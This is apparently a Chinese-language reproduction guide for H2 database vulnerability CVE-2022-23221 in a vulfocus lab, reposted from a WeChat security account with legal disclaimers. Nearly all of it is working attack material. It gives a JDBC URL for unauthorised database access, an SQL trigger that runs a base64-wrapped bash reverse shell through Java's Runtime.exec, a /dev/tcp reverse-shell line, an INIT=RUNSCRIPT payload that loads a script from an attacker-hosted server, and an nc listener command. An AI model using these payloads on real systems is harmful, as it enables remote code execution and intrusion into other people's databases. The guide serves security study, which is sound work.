声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
启动vulfocus靶场环境:
访问界面:
1、未授权进入数据库
(1)POC:
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;
(2)成功进入数据库
2、RCE执行反弹shell
(1)攻击机创建数据库文件:h2database.sql
CREATE TABLE test (id INT NOT NULL);CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascriptJava.type("java.lang.Runtime").getRuntime().exec("bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}");';
#反弹指令示例:
bash -i >& /dev/tcp/x.x.x.x/6666 0>&1(2)攻击机启动python服务
python3 -m http.server 端口(3)数据库登录界面填入payload
jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://攻击机IP:端口/h2database.sql';
(4)攻击机监听端口:nc -lvvp 6666
(5)成功上线:
原文始发于微信公众号(中泊研安全应急响应中心):H2数据库漏洞(CVE-2022-23221)复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论